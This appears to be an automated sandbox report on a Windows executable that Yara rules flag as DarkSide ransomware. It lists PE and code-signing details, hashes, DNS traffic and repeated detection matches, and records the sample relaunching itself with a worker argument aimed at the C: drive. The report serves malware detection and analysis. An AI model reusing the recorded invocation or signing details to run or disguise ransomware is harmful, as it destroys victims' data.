                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x40a30f
                                                                                      Entrypoint Section:.text1
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                      Time Stamp:0x602C1447 [Tue Feb 16 18:51:51 2021 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:f9ade0aa18f660a34a4fa23392e21838

                                                                                      Authenticode Signature

                                                                                      Signature Valid:true
                                                                                      Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                      Signature Validation Error:The operation completed successfully
                                                                                      Error Number:0
Not Before:12/20/2020 4:00:00 PM
Not After:12/21/2021 3:59:59 PM
                                                                                      Subject Chain
                                                                                      • CN=OASIS COURT LIMITED, O=OASIS COURT LIMITED, STREET=10 Stoneleigh Park, L=Colchester, S=Essex, PostalCode=CO3 9FA, C=GB
                                                                                      Version:3
                                                                                      Thumbprint MD5:45F07555A52F3B879EEF9866C1947E62
                                                                                      Thumbprint SHA-1:269F25E6B7C690AE094086BD7825D03B48D4FCB1
                                                                                      Thumbprint SHA-256:634D08D08A8AE4DBC0A8416DBB49C23DC44257E597DD7C0CB024F5EC41384370
                                                                                      Serial:00E4E795FD1FD25595B869CE22AA7DC49F

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push 00000010h
                                                                                      push 00410020h
                                                                                      push 00410010h
                                                                                      call 00007F96C8B8FBFCh
                                                                                      call 00007F96C8B8FE38h
                                                                                      call 00007F96C8B8FE60h
                                                                                      call 00007F96C8B8FE84h
                                                                                      call 00007F96C8B8ECBEh
                                                                                      push 00000000h
                                                                                      call dword ptr [0040B000h]
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0xb10c            0x28           .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x10000           0xeb9          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0xd200            0x1f58         .data
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x0               0x0
IMAGE_DIRECTORY_ENTRY_DEBUG            0xb010            0x1c           .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0xb000            0x10           .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0

                                                                                      Sections

Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy         Characteristics
.text    0x1000            0x8393         0x8400     False      0.953480113636    data        7.95739719557   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text1   0xa000            0x33c          0x400      False      0.5556640625      data        5.47111115827   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata   0xb000            0x158          0x200      False      0.384765625       data        2.56207517749   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data    0xc000            0x39f4         0x3400     False      0.969801682692    data        7.90932575456   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc    0x10000           0xec9          0x1000     False      0.935546875       data        7.68351864836   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                      Imports

                                                                                      DLL           Import
                                                                                      KERNEL32.dll  ExitProcess

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      UDP Packets

                                                                                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                                                                      May 12, 2021 06:16:17.734221935 CEST  53775        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:17.785813093 CEST  53           53775      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:19.093702078 CEST  51837        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:19.156347036 CEST  53           51837      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:20.232498884 CEST  55411        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:20.281095982 CEST  53           55411      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:21.276494026 CEST  63668        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:21.325546980 CEST  53           63668      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:22.491687059 CEST  54640        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:22.540365934 CEST  53           54640      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:23.515364885 CEST  58739        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:23.566950083 CEST  53           58739      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:28.770617962 CEST  60338        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:28.819262028 CEST  53           60338      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:30.193411112 CEST  58717        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:30.242543936 CEST  53           58717      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:31.716988087 CEST  59762        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:31.768779039 CEST  53           59762      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:33.713272095 CEST  54329        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:33.762053013 CEST  53           54329      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:34.846426010 CEST  58052        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:34.898863077 CEST  53           58052      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:35.964937925 CEST  54008        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:36.022229910 CEST  53           54008      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:38.119664907 CEST  59451        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:38.169435024 CEST  53           59451      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:41.686724901 CEST  52914        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:41.745548964 CEST  53           52914      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:44.449434042 CEST  64569        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:44.498147011 CEST  53           64569      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:46.528011084 CEST  52816        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:46.576726913 CEST  53           52816      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:49.871068954 CEST  50781        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:49.919935942 CEST  53           50781      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:51.195636988 CEST  54230        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:51.244385004 CEST  53           54230      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:52.195091009 CEST  54911        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:52.252332926 CEST  53           54911      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:52.467114925 CEST  49958        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:52.525242090 CEST  53           49958      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:54.195868969 CEST  50860        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:54.244698048 CEST  53           50860      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:16:55.365879059 CEST  50452        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:16:55.437237978 CEST  53           50452      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:17:12.209161997 CEST  59730        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:17:12.267398119 CEST  53           59730      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:17:21.004900932 CEST  59310        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:17:21.066346884 CEST  53           59310      8.8.8.8      192.168.2.7
                                                                                      May 12, 2021 06:17:56.347851992 CEST  51919        53         192.168.2.7  8.8.8.8
                                                                                      May 12, 2021 06:17:56.397886038 CEST  53           51919      8.8.8.8      192.168.2.7

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Memory Usage

                                                                                      High Level Behavior Distribution

                                                                                      Behavior

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:06:16:23
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:06:16:24
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000002.00000002.235019158.0000000000537000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:06:16:24
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000003.00000002.509189468.00000000004F8000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:06:16:25
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.432905231.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.362840336.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.327849253.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411060522.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408654426.0000000002B6A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.236181936.00000000007C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.435986395.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.337715138.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.299389052.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000002.516574687.0000000002DA2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.478288044.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.282398886.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.303767851.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.439503040.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.298944879.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.307244631.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.442911884.0000000002E08000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.295652654.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428084952.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288394609.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408145616.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.330427301.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.306781726.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.292805057.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.281893608.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.483773853.0000000002E39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.297343335.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.282524954.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.433763245.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288157426.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411401825.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.321471581.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.436219840.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.282409788.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.430404279.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411544467.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.432232782.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.474609577.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.407959058.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.429585276.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.328363880.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.236245311.00000000007C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411912846.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.302439227.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.290040157.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.307472011.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.443960653.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.353326118.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.362876492.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.433058006.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288198091.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.434687514.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.328783962.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.279059079.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411798869.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.293724321.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408432832.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.456394908.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.347522767.0000000002AA7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411159789.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410791890.0000000002B4D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.447874704.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.337437975.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.433675898.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.431227855.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408616972.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428965052.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.307770705.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288409928.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.348924422.0000000002AA7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.280790972.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.280803963.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.492039293.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.440558230.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.294802191.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.440164319.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.353303558.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.304436022.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428206439.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.443023882.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.293143940.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.432131880.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409798220.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428389024.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.289927003.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.328127290.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.493025969.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.368476921.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.429695025.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.448359001.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.304226241.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.483856895.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.293461617.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410319943.0000000002B4D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410677619.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
